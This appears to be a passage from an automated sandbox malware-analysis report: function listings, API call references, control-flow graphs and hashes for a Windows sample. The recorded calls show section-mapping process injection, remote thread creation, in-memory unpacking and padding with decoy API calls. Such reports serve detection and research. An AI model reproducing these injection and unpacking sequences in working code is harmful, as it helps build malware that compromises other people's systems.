                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_40b000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocLocal
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3494564517-0
                                                                                                                            • Opcode ID: c76493f27e26a282c6c9cfafab8c2d46abc60ae80d7b28fbf0ef9f8fe527b2c1
                                                                                                                            • Instruction ID: 452ad643668a9869e20cf026667031a7807d1b47aa2963159c3e27e96442b96b
                                                                                                                            • Opcode Fuzzy Hash: c76493f27e26a282c6c9cfafab8c2d46abc60ae80d7b28fbf0ef9f8fe527b2c1
                                                                                                                            • Instruction Fuzzy Hash: F0B012B094A2009FDB00CF90FC44B903BB4F358702F00D061F500C1160D7304404EF16

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00418D50 Relevance: 6.0, APIs: 4, Instructions: 45memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00418D84
                                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418D9F
                                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00418DC2
                                                                                                                            • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418DD1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516656554.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_40b000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2776817195-0
                                                                                                                            • Opcode ID: f30173706c358a0a2784e69d0405cb642d2262f11b42eed8560d13ebc88a1c06
                                                                                                                            • Instruction ID: e6d39fe0092bbab876aaf39b699cc254fd154f119dceba652d6ce7d41ca7bd17
                                                                                                                            • Opcode Fuzzy Hash: f30173706c358a0a2784e69d0405cb642d2262f11b42eed8560d13ebc88a1c06
                                                                                                                            • Instruction Fuzzy Hash: CD01D870A402049BD760AFA4FC45BDA37B4E71C705F40806AF605962D0DE745988DF9A
                                                                                                                            Function 00418CD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418CE4
                                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418CF6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516656554.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_40b000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCommEnvironmentFreeStrings
                                                                                                                            • String ID: -
                                                                                                                            • API String ID: 2991353152-2547889144
                                                                                                                            • Opcode ID: 8d08779753d9f8bcff46eaf4c583cf6f56908dff42d916d2df929441dec03c69
                                                                                                                            • Instruction ID: 810f788c3858191b0e6f136e57086e392da7284b159ae35535647157417a7ca4
                                                                                                                            • Opcode Fuzzy Hash: 8d08779753d9f8bcff46eaf4c583cf6f56908dff42d916d2df929441dec03c69
                                                                                                                            • Instruction Fuzzy Hash: 7CF0C83150530496E7119FA5ED807EE7B69EB19320F60422EED0456281CB784D8597AA

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:12%
                                                                                                                            Dynamic/Decrypted Code Coverage:16.5%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:176
                                                                                                                            Total number of Limit Nodes:8
                                                                                                                            execution_graph 3628 4019c0 3629 4019e7 3628->3629 3630 4019c8 3628->3630 3631 401a29 Sleep 3629->3631 3632 4014fb 7 API calls 3631->3632 3633 401a44 3632->3633 3634 4015fb 7 API calls 3633->3634 3635 401a55 3633->3635 3634->3635 3347 415e00 3350 4159a0 3347->3350 3349 415e05 3351 4159ad 3350->3351 3352 415bb6 3351->3352 3353 415aaf InterlockedCompareExchange ReadConsoleA FindAtomA GetConsoleMode SearchPathA 3351->3353 3354 415bc4 SetCommState 3352->3354 3358 415bdd 3352->3358 3355 415b09 6 API calls 3353->3355 3354->3352 3356 415ba7 3355->3356 3357 415b9e ReleaseSemaphore 3355->3357 3356->3352 3357->3356 3359 415cd0 3358->3359 3360 415bea 9 API calls 3358->3360 3371 415650 LocalAlloc 3359->3371 3367 415ca7 3360->3367 3364 415cd5 LoadLibraryW 3372 415680 GetModuleHandleW GetProcAddress VirtualProtect 3364->3372 3365 415d2d 3373 415910 3365->3373 3367->3359 3368 415d32 3369 415d6d InterlockedDecrement 3368->3369 3370 415d83 3368->3370 3369->3368 3370->3349 3371->3364 3372->3365 3374 415939 QueryDosDeviceA 3373->3374 3375 41594a 3373->3375 3374->3375 3384 415810 3375->3384 3378 415965 3387 415850 3378->3387 3379 41595d FreeEnvironmentStringsW 3379->3378 3382 41598c 3382->3368 3383 41597c HeapDestroy GetNumaHighestNodeNumber 3383->3382 3385 415821 FatalAppExitA GetModuleHandleW 3384->3385 3386 415833 3384->3386 3385->3386 3386->3378 3386->3379 3388 415874 BuildCommDCBW 3387->3388 3391 415883 3387->3391 3388->3391 3389 4158dd 3389->3382 3389->3383 3391->3389 3392 4158b9 SetCalendarInfoW GetShortPathNameW 3391->3392 3393 415840 3391->3393 3392->3391 3396 4157d0 3393->3396 3397 4157f9 3396->3397 3398 4157ec ResetEvent 3396->3398 3397->3391 3398->3397 3570 402f42 3571 402f18 3570->3571 3572 4019e0 15 API calls 3571->3572 3573 40304f 3571->3573 3572->3573 3586 403103 3587 403246 3586->3587 3588 40312d 3586->3588 3588->3587 3589 4031f0 RtlCreateUserThread NtTerminateProcess 3588->3589 3589->3587 3494 401606 3494->3494 3495 401609 3494->3495 3496 4017cb 3495->3496 3497 4016af NtDuplicateObject 3495->3497 3497->3496 3498 4016cc NtCreateSection 3497->3498 3499 4016f2 NtMapViewOfSection 3498->3499 3500 40174c NtCreateSection 3498->3500 3499->3500 3501 401715 NtMapViewOfSection 3499->3501 3500->3496 3502 401778 3500->3502 3501->3500 3504 401733 3501->3504 3502->3496 3503 401782 NtMapViewOfSection 3502->3503 3503->3496 3505 4017a9 NtMapViewOfSection 3503->3505 3504->3500 3505->3496 3506 401613 3507 40161c 3506->3507 3508 4016af NtDuplicateObject 3507->3508 3516 4017cb 3507->3516 3509 4016cc NtCreateSection 3508->3509 3508->3516 3510 4016f2 NtMapViewOfSection 3509->3510 3511 40174c NtCreateSection 3509->3511 3510->3511 3512 401715 NtMapViewOfSection 3510->3512 3513 401778 3511->3513 3511->3516 3512->3511 3517 401733 3512->3517 3514 401782 NtMapViewOfSection 3513->3514 3513->3516 3515 4017a9 NtMapViewOfSection 3514->3515 3514->3516 3515->3516 3517->3511 3399 403257 3400 4031f0 RtlCreateUserThread NtTerminateProcess 3399->3400 3402 403261 3399->3402 3401 403246 3400->3401 3402->3402 3544 402ed9 3545 402e8d 3544->3545 3545->3544 3546 4019e0 15 API calls 3545->3546 3547 40304f 3545->3547 3546->3547 3403 6d5a06 3406 6d5a12 3403->3406 3407 6d5a21 3406->3407 3410 6d61b2 3407->3410 3412 6d61cd 3410->3412 3411 6d61d6 CreateToolhelp32Snapshot 3411->3412 3413 6d61f2 Module32First 3411->3413 3412->3411 3412->3413 3414 6d5a11 3413->3414 3415 6d6201 3413->3415 3417 6d5e71 3415->3417 3418 6d5e9c 3417->3418 3419 6d5ead VirtualAlloc 3418->3419 3420 6d5ee5 3418->3420 3419->3420 3420->3420 3636 4019eb 3637 4019f0 3636->3637 3638 401a29 Sleep 3637->3638 3639 4014fb 7 API calls 3638->3639 3640 401a44 3639->3640 3641 4015fb 7 API calls 3640->3641 3642 401a55 3640->3642 3641->3642 3456 53003c 3457 530049 3456->3457 3469 530e0f SetErrorMode SetErrorMode 3457->3469 3462 530265 3463 5302ce VirtualProtect 3462->3463 3465 53030b 3463->3465 3464 530439 VirtualFree 3468 5304be LoadLibraryA 3464->3468 3465->3464 3467 5308c7 3468->3467 3470 530223 3469->3470 3471 530d90 3470->3471 3472 530dad 3471->3472 3473 530dbb GetPEB 3472->3473 3474 530238 VirtualAlloc 3472->3474 3473->3474 3474->3462 3548 415cf4 3549 415d00 LoadLibraryW 3548->3549 3557 415680 GetModuleHandleW GetProcAddress VirtualProtect 3549->3557 3552 415d2d 3553 415910 10 API calls 3552->3553 3554 415d32 3553->3554 3555 415d6d InterlockedDecrement 3554->3555 3556 415d83 3554->3556 3555->3554 3557->3552 3626 53092b GetPEB 3627 530972 3626->3627 3558 4014fa 3559 40150c 3558->3559 3560 4016af NtDuplicateObject 3559->3560 3569 4015ea 3559->3569 3561 4016cc NtCreateSection 3560->3561 3560->3569 3562 4016f2 NtMapViewOfSection 3561->3562 3563 40174c NtCreateSection 3561->3563 3562->3563 3564 401715 NtMapViewOfSection 3562->3564 3565 401778 3563->3565 3563->3569 3564->3563 3567 401733 3564->3567 3566 401782 NtMapViewOfSection 3565->3566 3565->3569 3568 4017a9 NtMapViewOfSection 3566->3568 3566->3569 3567->3563 3568->3569 3421 402fbe 3423 402fc3 3421->3423 3422 40304f 3423->3422 3425 4019e0 3423->3425 3426 4019e7 3425->3426 3427 401a29 Sleep 3426->3427 3432 4014fb 3427->3432 3429 401a44 3431 401a55 3429->3431 3444 4015fb 3429->3444 3431->3422 3433 40150c 3432->3433 3434 4016af NtDuplicateObject 3433->3434 3442 4015ea 3433->3442 3435 4016cc NtCreateSection 3434->3435 3434->3442 3436 4016f2 NtMapViewOfSection 3435->3436 3437 40174c NtCreateSection 3435->3437 3436->3437 3438 401715 NtMapViewOfSection 3436->3438 3439 401778 3437->3439 3437->3442 3438->3437 3443 401733 3438->3443 3440 401782 NtMapViewOfSection 3439->3440 3439->3442 3441 4017a9 NtMapViewOfSection 3440->3441 3440->3442 3441->3442 3442->3429 3443->3437 3445 40160b 3444->3445 3446 4016af NtDuplicateObject 3445->3446 3455 4017cb 3445->3455 3447 4016cc NtCreateSection 3446->3447 3446->3455 3448 4016f2 NtMapViewOfSection 3447->3448 3449 40174c NtCreateSection 3447->3449 3448->3449 3450 401715 NtMapViewOfSection 3448->3450 3451 401778 3449->3451 3449->3455 3450->3449 3453 401733 3450->3453 3452 401782 NtMapViewOfSection 3451->3452 3451->3455 3454 4017a9 NtMapViewOfSection 3452->3454 3452->3455 3453->3449 3454->3455 3455->3431

                                                                                                                            Executed Functions

                                                                                                                            Function 004159A0 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 309timefilepipeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 4159a0-4159c8 2 4159d0-4159d7 0->2 3 415a04-415a0a 2->3 4 4159d9-415a00 2->4 5 415a0c-415a18 3->5 6 415a1e-415a28 3->6 4->3 5->6 7 415a63-415a6a 6->7 8 415a2a-415a59 6->8 7->2 9 415a70-415a76 7->9 8->7 11 415a78-415a7e 9->11 12 415a80-415a86 11->12 13 415a8c-415a93 11->13 12->13 14 415a95 13->14 15 415a99-415aa0 13->15 14->15 15->11 16 415aa2-415aa9 15->16 17 415bb6-415bc2 16->17 18 415aaf-415b9c InterlockedCompareExchange ReadConsoleA FindAtomA GetConsoleMode SearchPathA GetDefaultCommConfigA CopyFileW ConnectNamedPipe ReadConsoleOutputW GetModuleFileNameW GetSystemTimeAdjustment 16->18 19 415bc4-415bd2 SetCommState 17->19 22 415ba7-415bb3 18->22 23 415b9e-415ba1 ReleaseSemaphore 18->23 24 415bd4-415bdb 19->24 25 415bdd-415be4 19->25 22->17 23->22 24->19 24->25 27 415cd0-415cdf call 415650 25->27 28 415bea-415cca GetConsoleAliasesLengthA GetComputerNameW GetTimeFormatA GetFileAttributesA GetConsoleAliasExesLengthW GetBinaryTypeW FormatMessageA GetLongPathNameA GetCommState 25->28 33 415ce1-415cf2 27->33 34 415d1d-415d28 LoadLibraryW call 415680 27->34 28->27 36 415d00-415d10 33->36 40 415d2d-415d3e call 415910 34->40 38 415d12 36->38 39 415d18-415d1b 36->39 38->39 39->34 39->36 45 415d40-415d47 40->45 46 415d57-415d5d 45->46 47 415d49-415d53 45->47 48 415d64-415d6b 46->48 49 415d5f call 415670 46->49 47->46 52 415d7a-415d81 48->52 53 415d6d-415d74 InterlockedDecrement 48->53 49->48 52->45 56 415d83-415d93 52->56 53->52 57 415da0-415db0 56->57 58 415db2 57->58 59 415db9-415dbc 57->59 58->59 59->57 60 415dbe-415dc9 59->60 61 415dd0-415dd5 60->61 62 415dd7-415ddd 61->62 63 415ddf-415de5 61->63 62->63 64 415de7-415df4 62->64 63->61 63->64
                                                                                                                            APIs
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415ABA
                                                                                                                            • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00415AC7
                                                                                                                            • FindAtomA.KERNEL32(00000000), ref: 00415ACE
                                                                                                                            • GetConsoleMode.KERNEL32(00000000,00000000), ref: 00415AD6
                                                                                                                            • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415AEE
                                                                                                                            • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00415B15
                                                                                                                            • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 00415B1E
                                                                                                                            • ConnectNamedPipe.KERNEL32(?,00000000), ref: 00415B32
                                                                                                                            • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415B77
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00415B86
                                                                                                                            • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00415B8F
                                                                                                                            • ReleaseSemaphore.KERNEL32(00000000,00000000,00000000), ref: 00415BA1
                                                                                                                            • SetCommState.KERNELBASE(00000000,00000000), ref: 00415BC8
                                                                                                                            • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415BF9
                                                                                                                            • GetComputerNameW.KERNEL32(?,?), ref: 00415C0D
                                                                                                                            • GetTimeFormatA.KERNEL32(00000000,00000000,?,00417314,?,00000000), ref: 00415C4D
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00415C54
                                                                                                                            • GetConsoleAliasExesLengthW.KERNEL32 ref: 00415C5A
                                                                                                                            • GetBinaryTypeW.KERNEL32(00417334,?), ref: 00415C6C
                                                                                                                            • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00415C7F
                                                                                                                            • GetLongPathNameA.KERNEL32(00417364,?,00000000), ref: 00415C92
                                                                                                                            • GetCommState.KERNEL32(00000000,00000000), ref: 00415C9A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777292131.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_40b000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Console$CommFileName$FormatLengthPathReadStateTime$AdjustmentAliasAliasesAtomAttributesBinaryCompareComputerConfigConnectCopyDefaultExchangeExesFindInterlockedLongMessageModeModuleNamedOutputPipeReleaseSearchSemaphoreSystemType
                                                                                                                            • String ID: @3#v$P4#vp^5w$k`$}$
                                                                                                                            • API String ID: 3800548968-402751238
                                                                                                                            • Opcode ID: 5e6c1ea0dd6b9c12ce414f54bdebe71c2c6476f5e84dd2541a6dae526580182b
                                                                                                                            • Instruction ID: b74f69d15b1c00e371bae04283b2e7407a3b84b28a54ffdc86722d59f2fd5859
                                                                                                                            • Opcode Fuzzy Hash: 5e6c1ea0dd6b9c12ce414f54bdebe71c2c6476f5e84dd2541a6dae526580182b
                                                                                                                            • Instruction Fuzzy Hash: 6CB11671841528EBD725DB61DC48EEF7B78EF49350F0180AAF609A2150DB789AC1CFAD
                                                                                                                            Function 004014FB Relevance: 10.8, APIs: 7, Instructions: 316COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 151 4014fb-401504 152 40151b 151->152 153 40150c-40152e 151->153 152->153 158 401531-401545 call 40127e 153->158 163 40154a-401555 158->163 163->163 164 401558-40155a 163->164 165 40155d-401572 164->165 168 401574-401579 165->168 170 4015c4 168->170 171 40157b 168->171 172 4015c6 170->172 173 40162f-401632 170->173 174 4015f6-4015f8 171->174 175 40157d-40159a 171->175 172->168 176 4015c8-4015cd 172->176 177 401634-401659 call 40127e 173->177 178 4016a5-4016a6 173->178 185 40159d 175->185 186 40152f-401530 175->186 181 401648-401659 176->181 182 4015cf-4015d0 176->182 188 40165b 177->188 189 40165e-401663 177->189 183 4016a7-4016a9 178->183 184 40162d 178->184 181->188 181->189 190 4015d2-4015e8 182->190 191 4015b6-4015b9 182->191 192 401987 183->192 193 4016af-4016c6 NtDuplicateObject 183->193 184->173 185->165 194 40159f-4015a1 185->194 186->158 188->189 215 401989-401991 189->215 216 401669-40167a 189->216 196 4015ea-4015f5 190->196 197 40157c 190->197 191->177 195 4015bb-4015c3 191->195 202 401996-4019dd call 40127e 192->202 193->192 198 4016cc-4016f0 NtCreateSection 193->198 200 4015a3 194->200 201 40161c 194->201 195->170 196->174 197->175 204 4015a9-4015b4 197->204 205 4016f2-401713 NtMapViewOfSection 198->205 206 40174c-401772 NtCreateSection 198->206 208 40161e-40162c 200->208 210 4015a5-4015a6 200->210 201->208 204->191 205->206 212 401715-401731 NtMapViewOfSection 205->212 206->192 214 401778-40177c 206->214 208->177 219 401643 208->219 210->204 212->206 220 401733-401749 212->220 214->192 217 401782-4017a3 NtMapViewOfSection 214->217 215->189 215->202 216->192 226 401680-4016a3 216->226 217->192 221 4017a9-4017c5 NtMapViewOfSection 217->221 219->177 220->206 221->192 225 4017cb call 4017d0 221->225 226->183
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 934dc258b1fd10f4e66b4cbfde8a53cb0d8b0c8237b07dea73acb5d59905d160
                                                                                                                            • Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
                                                                                                                            • Opcode Fuzzy Hash: 934dc258b1fd10f4e66b4cbfde8a53cb0d8b0c8237b07dea73acb5d59905d160
                                                                                                                            • Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A
                                                                                                                            Function 004015FB Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 237 4015fb-401604 238 401615 237->238 239 40160b-401611 237->239 238->239 240 401618-40162c 238->240 239->240 244 401643 240->244 245 401634-401659 call 40127e 240->245 244->245 250 40165b 245->250 251 40165e-401663 245->251 250->251 253 401989-401991 251->253 254 401669-40167a 251->254 253->251 259 401996-4019dd call 40127e 253->259 257 401680-4016a9 254->257 258 401987 254->258 257->258 267 4016af-4016c6 NtDuplicateObject 257->267 258->259 267->258 269 4016cc-4016f0 NtCreateSection 267->269 271 4016f2-401713 NtMapViewOfSection 269->271 272 40174c-401772 NtCreateSection 269->272 271->272 274 401715-401731 NtMapViewOfSection 271->274 272->258 275 401778-40177c 272->275 274->272 278 401733-401749 274->278 275->258 276 401782-4017a3 NtMapViewOfSection 275->276 276->258 279 4017a9-4017c5 NtMapViewOfSection 276->279 278->272 279->258 281 4017cb call 4017d0 279->281
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                                                                            • Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
                                                                                                                            • Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                                                                            • Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64
                                                                                                                            Function 00401613 Relevance: 10.7, APIs: 7, Instructions: 176nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 285 401613-40162c 289 401643 285->289 290 401634-401659 call 40127e 285->290 289->290 295 40165b 290->295 296 40165e-401663 290->296 295->296 298 401989-401991 296->298 299 401669-40167a 296->299 298->296 304 401996-4019dd call 40127e 298->304 302 401680-4016a9 299->302 303 401987 299->303 302->303 312 4016af-4016c6 NtDuplicateObject 302->312 303->304 312->303 314 4016cc-4016f0 NtCreateSection 312->314 316 4016f2-401713 NtMapViewOfSection 314->316 317 40174c-401772 NtCreateSection 314->317 316->317 319 401715-401731 NtMapViewOfSection 316->319 317->303 320 401778-40177c 317->320 319->317 323 401733-401749 319->323 320->303 321 401782-4017a3 NtMapViewOfSection 320->321 321->303 324 4017a9-4017c5 NtMapViewOfSection 321->324 323->317 324->303 326 4017cb call 4017d0 324->326
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                                                                            • Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
                                                                                                                            • Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                                                                            • Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64
                                                                                                                            Function 00401606 Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 330 401606-401607 330->330 331 401609 330->331 332 40160b-40162c 331->332 333 40163c-401659 call 40127e 331->333 343 401643 332->343 344 401634-401639 332->344 341 40165b 333->341 342 40165e-401663 333->342 341->342 346 401989-401991 342->346 347 401669-40167a 342->347 343->344 344->333 346->342 352 401996-4019dd call 40127e 346->352 350 401680-4016a9 347->350 351 401987 347->351 350->351 360 4016af-4016c6 NtDuplicateObject 350->360 351->352 360->351 362 4016cc-4016f0 NtCreateSection 360->362 364 4016f2-401713 NtMapViewOfSection 362->364 365 40174c-401772 NtCreateSection 362->365 364->365 367 401715-401731 NtMapViewOfSection 364->367 365->351 368 401778-40177c 365->368 367->365 371 401733-401749 367->371 368->351 369 401782-4017a3 NtMapViewOfSection 368->369 369->351 372 4017a9-4017c5 NtMapViewOfSection 369->372 371->365 372->351 374 4017cb call 4017d0 372->374
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1652636561-0
                                                                                                                            • Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                                                                            • Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
                                                                                                                            • Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                                                                            • Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64
                                                                                                                            Function 00401627 Relevance: 10.7, APIs: 7, Instructions: 170nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 378 401627-40162c 382 401643 378->382 383 401634-401659 call 40127e 378->383 382->383 388 40165b 383->388 389 40165e-401663 383->389 388->389 391 401989-401991 389->391 392 401669-40167a 389->392 391->389 397 401996-4019dd call 40127e 391->397 395 401680-4016a9 392->395 396 401987 392->396 395->396 405 4016af-4016c6 NtDuplicateObject 395->405 396->397 405->396 407 4016cc-4016f0 NtCreateSection 405->407 409 4016f2-401713 NtMapViewOfSection 407->409 410 40174c-401772 NtCreateSection 407->410 409->410 412 401715-401731 NtMapViewOfSection 409->412 410->396 413 401778-40177c 410->413 412->410 416 401733-401749 412->416 413->396 414 401782-4017a3 NtMapViewOfSection 413->414 414->396 417 4017a9-4017c5 NtMapViewOfSection 414->417 416->410 417->396 419 4017cb call 4017d0 417->419
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
